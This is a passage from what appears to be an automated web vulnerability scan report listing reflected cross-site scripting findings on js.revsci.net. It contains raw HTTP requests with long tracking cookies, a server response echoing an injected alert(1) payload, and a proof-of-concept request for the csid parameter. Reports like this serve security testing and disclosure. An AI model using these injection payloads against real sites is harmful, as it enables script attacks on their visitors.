Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_x5er="MLsXtSMNbzpvJREZ68UcOOELrMtuPiIcCFkCnclTxJH8vk8TdcY5465J7VBINn40uY1VQWw6JvjAI9t21D7Bk/o4BGnARfz2D8J9JpKmmLrJwmjhu+F9kS5HBlosiV+MwZlRpo0Yic5I7OwUqEFmbnJVDaLqlSgeJ/pHvCqc3sVLFzxLw8MQ3dmk9yVVFYnzxsr8iYJBk0DOpTWbdg1qj0zZ+WHbRhhUG0jd4yT/ZdRgSBa7Qcioo01+P881F/DtQVXIoeBjo+fSGHr7Hm616pD1S+rp4T6szpEDuIB6JXtt3LM4OZ2D4Ql2AgapEhjc61SHhQSqzoz+B6MuA4pEs7oTuNMKNnTMBK8HFPC2w0ylwb2IbnSo7BtekfnjeG0WGR0n5bdkrjkHh1ha4pHuQ+Qm71mjHzjR9jUJy4pBtjIMmQOisxaeRr7i3Q51KDjYLHsfF17k/h3RRZ2Kz0Es2MOg5dP7NgAN8Gbd72FnAkRVB9sURu09fIxVicKPPWVp393mx/72fqMKlbhej8hLfVnPWSdc8IkAuNByGNJ4mCK6EsGZkx9ymq6Qaki9vuOA4Y0BJtuwxywO2wh3kzFPXu0ekEsFNf+EyX0U2cDoJGvuLGhxzpwV8I2842FUPTRxfcQTYvGOo6N2FFg3ATETybTP4PlZH0jFFk7n3mfFRcit74J7eiwCBqLUXbmAgFq8wYWDzHO0b9se8K34r3+arxK6o7qlvZJhy3nCbI7xIFSDqTRfgPLlmsxCW7rYYU92wmM9mIWT2aj001qjH0OFz8R/sqNySK1l2PnfcBFCB80n2V82LxLOw6/mJe6JcUxFOmrOsylOxOCwJmB6Ts607wrnVVIcTt2go27IlWFiEBVBy+i0HKKLmTJ1vV5MTY33oZ5PG074Wp+iiW5rlRWPlmHONXB9mtG8hC9sLk1qHArZ6/D6pzphfYKHXKApg+Cj4Wuyg42siPA826mPNz6os5bQx1z7tKKDuLy+l3C4eknnzcatEuEQRQ+9zdFFyfYmCVlF8VD2rzkBDrHfT7srmoLMmMYwTtDyt7dohSAfrb/B7shmxeIhC7Xdm62f5YOCi7VnQ25U96jf6V5u7ADZwigBDvvvtDCgBpD1qrpk5pp4l152gjxk4EQYYr9wK4KSK+RT6QdLqpLmEZit5Qwmufxfw02Q48TSIdQh8bEBLwbz5yeNAP3lYHA3/yI9iOq7R0oFD8y4sxZT4qIFLUplwQGJni2pRVG3ZpqBgCqmWoApZw2LkxfS9ozRkR5lKkLCp+8CLuIB6eTs791Nx11Avipvs5BgJHxC96nQQOxCCjvABvhdxvIML0oZ25qey4qO5JlLmXLv3H69/srXaHpuF0I1yC8xzyfGwzdFShq6QGPGCHpf8JIrSvVXukYt8ee58Gc30EvqlxSK3HE9/BmDzgFiJBr6iPHhVfzHL2sV9j6BQQYc+Yn6SUBKiCMGIjDrFGxoTHwByfc2v/aSMT45dNX64BwOyL89dYdND8vOzxYS/8AaxCCDscccYcQ9L4kWtDHZ4zM7NQFnbPkAVzIU5TPUo2EJ8Rhi/bSKU7znZqNZruBBE7WnlneSmXPTIH+qfpA="; rsi_us_1000000="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"; udm_0=MLv3NzUNZjhr3tNDUOn9R09Q/iVINsi+A+62LxZQIiiDoaro9jANDYuXCoMWXJpEr578X/X/rStRjsP29zg0eOpl2kN6IAh9mCZ6f40jwpXbbR+M1nJLx0XUrtRq+BAu8ru7oLa+85zbDpVa3xBcWiHxY9A7dq3vlkyv1tnZ/vyxy4fwHWFmR9Iz9qnb6JniT6m5GU/0iA+/u2lQ+sDDQ0DsfbD/1HdpBDpIesxPX8JYnddhi+eqbbvUkZrOLLaCtlYFuo7Ob5E82tMkVARU/PCkJ3dsJIt8ZbjoWqnTI2ek6Dd2MG8ifA/Av5y3VFP3yDjr6k7wjucgDT2WFOo2bfd7pvxilQQmbcV16QUZsLybZw6Qpj8GeQH2POWhO3g7raALq7hM5BQYqhsnKxe2cjW38bmUP0itRNNt4b4aEEv2m9TqUjm5yKtenGu3q/Pb46uAHZrrJx22VDMbjyt/6FpyJYhs1wNQ40ZYZEKAgyKvINMvL+zkd2kE67GkzfB3GNOPg+7Xxq0e3sBqr5fUKuU7f6EupmnTnb8CWrd05apeZ3eWkTixOusVjXSCXkT+/BwVGALQuoZn8FMskA4dYPbfDk5OItDsA7zUDxdjRRXrk2GmX945Da+s1UjZW3U+2xaoJTGLybF07NRPZ1eegSpQDH8u1Si7Y1n+jo7hC29xnK1nt1mMwbul5U1fBU3fsCNiopFyZScl1+BuGFMen8igEiOgzObkp+pdBeVAmrlUtFsnjfjlRhi6K7c0FG/LrKLuG3Kyak18TSY5lYta7kIh4QTHXu0sX+6B0KW7XWoIGo0tcEKmgCVzyNegLa3WK1gjpmROjIsqnfoXpavGi5e+6+WUuqx+UeWUK0e6r/rZ6nCql5SwkI9Jyhf9gPJeAftVgqPS2efn2RBBB8mVKj7/Zzr+ev5n1AX2t+6PuG+NLGg4zUFYLg1dfJDT34/dRV9RX2d8W4Qhz6a0BUfjecgsb9KuZ4RrkG+qRnW7ddvIt2FVfZEmF+lzvhwH6WJIVZP/2d0cyPdC7MwIIbMTXAcLqo+ST1Y6nDncz0vVkuZ+UvNtcVrJUKd8b4UkIT469uS1TR+zkUJnhtPOzR5oPxxfmtE4vTLysJzCsuZY0KaZF3o1b6Yh8paN9qwUBV8R+vYtWNuaXSKaFsAWASQocuwiAYwyatk78mvmhA/RnDRWxFdxotmakTxLvxzdq20H2gNsfqEt7Fr2/Uh+++at/ksN76MFaJqO/bHkpoPu1gxHvKE9/0WMUVGMcm+6yyK+UG+alVWR/xvTeJmgll+2K5e9GyGLi/m3caGDdFwjN956qZoIxWHJA6AgPh7pKjFfoub0NM8jvqk69NazhEPpf3w2zbu+8yR3WGhP8zmoR6Rq73hajz6P98Iz6wvHDPDF7NOh2eR4AjPxQGp004z0qhExX1GC9nQYmTybV4IuJxurDjTji5yZDzRQY7cou3zrZ/OeESC6R5U4GbP69VvQ1FHhRDn7/D8gBKB6tDfEZV4tgGLWbTk+afHTH3j54xDk4yOl6Fx0oXVI2yyVgY27oyTAqHr4erT0JEcynxQEX17ZG6jk0i7Lvp6W1t6qdrx4IjeSjvpTp2NgZepvB/QSSCrrLZmWLcfno6pocoCk4/2SxgR5UeVjIHZgwNuNyBaWMutI8AJTw/0lL66llJmLjDmyMjB1t3dxVUjfg4suAfkuSjQR4zU9jwdsDhHM2yr45NHlR80Odampgef9bMqJglD/rX8j1N+u6IunIEoNNi4sdBAnypfFOOaEJ678vsSgaICcHnT5o+Wd; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; rtc_N2gr=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; rsi_segs_1000000=pUPF40mhOXMQJ/AtY6gq+mlXT522ui4UYAcRGaESFrJx8TYUFUcMpoM7enamDct4VKj1xrFdOTqQUQ3pUP1MDghOnCvRZ0214o3xUtaZ68nIc1VnMLmCIeegv3Y1WwDp8AIdZ5hqHKU38yRCkO6EVyoNTQYIOyyB1bbJfhYCtxeN4FAMThtqRqzLjZec6jzqKUqLrjFKfNTfGk4gg0636KgeJeemkPacnGpzcBVfhaHGh5+5HatXnwl381BaqY81KvvzuBGONoXhIx83OpFD1tR3YfP3a7TkLLmV2qsPCs2IcxdTv8Z16030H4XyXKyhS7zAQxpqNX2/4kAmja7XaES27kxmvzOlOPMbUj6Cm3SfhwUTUthzNXzAtwRv6N00BGCYDAEY0T/+ocHSxN122t3XU3Lo1znyYeQ5gm98FTKbZYCcHFYUxDfLnpQh/6WqsBCfkrnJY6wvtK/jYdP7J9OWHJkd7czh0TuDEHoC49Ec5JTCdMeKygbXcL5Lf3iaMe9U018EYDX8emPwX8aTEio9Ynai0hDVaDgWj97fMo3h52SvvCg+a19cEIM3kBs+74ch0R+eVGZ+XE7xwIhKXTKkfJdg/3giiKh210fg/DaUe0yC7PRLTYPHOA+VejPfTuHoHDTX+/kUH2Zmc9IQpJmuppdilLBRA2hqW5r1TlfG4514tvrmi17RqHW6+HrVV40axtQ8MF8jfSxfZkXojxtpdBcKyJ9yZNzbCDC3ghRqJkiyUvtT2jSVAmK/flOnpnuLsUg3lzgJ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpnHrwgDJuKIEUqVcBQc0PnE+r2nt71VAcNN+QJmJ1KIFbP2VbFtNrz2MGSvr68d9MwGuvjeeMnUpXRqe7OlSLq6v0DFjAJAB1bQRiWejHoQ0TRbpkmxumRFzQQ8Iu+VqzZr0+S7J6csKakbFkOtrbdtgbqem9n/2FK/y9vbu4V5nIlfaatDmTtfHdbkZ89QIup7PVCvvXxOvZRA1HJ7+rjV7iV6ACMkbIfLzQDeFo0r0RG/JLcHb0uUb4DHYWoNaiN9zOzdg9KsOS5TdaBRsIQ++qaCp0fPWdyUy9AS6HpYX4iKgwiN+j0Y5ND70VwaJqu+JW4wH2o+8kx1y6+zNgS2lZYuG2wbBCfUkXzJ3UgLjFnr6UwENbSQv09t3J0p6ba453Jf7XBmpXNr1pyE8z6eMFH/AtwLNHnc9rFK3jQ9gAaq0duM1x47nhRwyIPtx2F0u+8tPTUA2HcaCDnYmoNuWxj7btUJFglI6WGZCwl4Kp9SGeBRTQwpFTZtwjBv7XWP9qGFmVuviIx+PZrB1YH2C91+dEGuMLPKpJz35mlYP3AMp4VRFSvd22FrcVt8mqtNP+bhyc/RYR3h/XROO4wQctiw2owGjMCBApjXyeDBi/wUdVBi9NXTmlVlkIGxXpFvH8IO+Doa49qopwbYFZH99FxP9KLf/iEGXYsfvDN+T0O9JeT6xtZmO9tA1hb3m0DKzlhQlerOYvSmqCgksqzsD/yiY7gSw+y381SvZIjsgcvhkPWGEoYiJ6MAgmZ9nOunLETo/N6DP6cOPWBPr8jmrkHwKFO6p/fKPzQwViCPrlLPkwlyIvltqg4KlhIoRueiIswP/TroacSy2ekqbC6nv3hnxKV/Jnbp29QugiX3J/rtTm2M+E8wHfVMBOwyJciRGZtEt2SrxLzkZDEskqpy3f4dJ8YpjI7dcRomtcXoWcc4Q1qsTdAI4oIbteE/+5icrlVaCh5h3F4GiEY9ZiZR2ol+uFLpr/3Jzp/upwaCeRcy2VEEY26eWJ1e0oaJWCxNPbb5z8/ZoHpumNTyhVbSb9Ts9cx+KdaPAAK5gpqgTwRE8Vv4Z91TdsrZhuUqCN5r1R6MT1Nv/Vd0jHoeo0ctE5K0yFPn2nT7f5fwY3VC/27A1kk0BOOzWpNmVpFbeQJYpJreBJCgecR1fNNRnJUhXx0islk1XYn/NfO2zVhdqTIpRb4+UyMD2r+d2MDh1zuxgE/JEPxN1BV7D3FALI0kLpMRIwDHWt2cAZTL3jjZTdJisXDD6v+08tFLMrtjBWdtcUDTtPeRC+QnpiyZjDucOXlpHqte7Dp7NdMxytX8EOJN1wMDWgp7PAvJi89LSG1DzuIbr96KBNG3Tdz+yl5MTCqAmnpntuRlpJ9lFti1BAaHaavsr7wDg9Xgnaw+AugSaBbyLjBYSQIgBNY81Pmjjuq/KBdkYzDFy6xeANzzFRrzzNCZdY2ByT/9jg9mnGyAEOFTRjPOiEcxCWopqRv61aYt8Hja1fJeXXGFfYJEt8ylG17y3Y2M1Nf1XN/kLcyAAJmyKwLnfPuXX7m7MVO8iwNSAlAQzfMAZ2rzowf3ztUZ2ytjUojaMR1ce91pPllqTvFx2QqJM0SapA+THp+8QlhGiGo4Hgr6agEGFvdTwKgBQFlb4Apqft7X6c3TwUqlMhlEnoxjDdTJ9SmebmLvz38CmxmyMw/pGZLM3COR7YmNFicVDQaacyXQzI1XzU9xzLvDQngQXuuc4/CYUXKAbZhygjKLNAKwnkyQAYkNfcgL9d+llilfw==; Domain=.revsci.net; Expires=Fri, 22-Jun-2012 11:12:04 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 11:12:04 GMT
Content-Length: 6622

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S0244b0836';alert(1)//af4986e48da');else DM_addEncToLoc("bpid",'S0244b0836';alert(1)//af4986e48da');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

3.32. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b1454<script>alert(1)</script>30211bf6439 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610b1454<script>alert(1)</script>30211bf6439&bpid=S0244 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.viti.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_x5er="MLsXtSMNbzpvJREZ68UcOOELrMtuPiIcCFkCnclTxJH8vk8TdcY5465J7VBINn40uY1VQWw6JvjAI9t21D7Bk/o4BGnARfz2D8J9JpKmmLrJwmjhu+F9kS5HBlosiV+MwZlRpo0Yic5I7OwUqEFmbnJVDaLqlSgeJ/pHvCqc3sVLFzxLw8MQ3dmk9yVVFYnzxsr8iYJBk0DOpTWbdg1qj0zZ+WHbRhhUG0jd4yT/ZdRgSBa7Qcioo01+P881F/DtQVXIoeBjo+fSGHr7Hm616pD1S+rp4T6szpEDuIB6JXtt3LM4OZ2D4Ql2AgapEhjc61SHhQSqzoz+B6MuA4pEs7oTuNMKNnTMBK8HFPC2w0ylwb2IbnSo7BtekfnjeG0WGR0n5bdkrjkHh1ha4pHuQ+Qm71mjHzjR9jUJy4pBtjIMmQOisxaeRr7i3Q51KDjYLHsfF17k/h3RRZ2Kz0Es2MOg5dP7NgAN8Gbd72FnAkRVB9sURu09fIxVicKPPWVp393mx/72fqMKlbhej8hLfVnPWSdc8IkAuNByGNJ4mCK6EsGZkx9ymq6Qaki9vuOA4Y0BJtuwxywO2wh3kzFPXu0ekEsFNf+EyX0U2cDoJGvuLGhxzpwV8I2842FUPTRxfcQTYvGOo6N2FFg3ATETybTP4PlZH0jFFk7n3mfFRcit74J7eiwCBqLUXbmAgFq8wYWDzHO0b9se8K34r3+arxK6o7qlvZJhy3nCbI7xIFSDqTRfgPLlmsxCW7rYYU92wmM9mIWT2aj001qjH0OFz8R/sqNySK1l2PnfcBFCB80n2V82LxLOw6/mJe6JcUxFOmrOsylOxOCwJmB6Ts607wrnVVIcTt2go27IlWFiEBVBy+i0HKKLmTJ1vV5MTY33oZ5PG074Wp+iiW5rlRWPlmHONXB9mtG8hC9sLk1qHArZ6/D6pzphfYKHXKApg+Cj4Wuyg42siPA826mPNz6os5bQx1z7tKKDuLy+l3C4eknnzcatEuEQRQ+9zdFFyfYmCVlF8VD2rzkBDr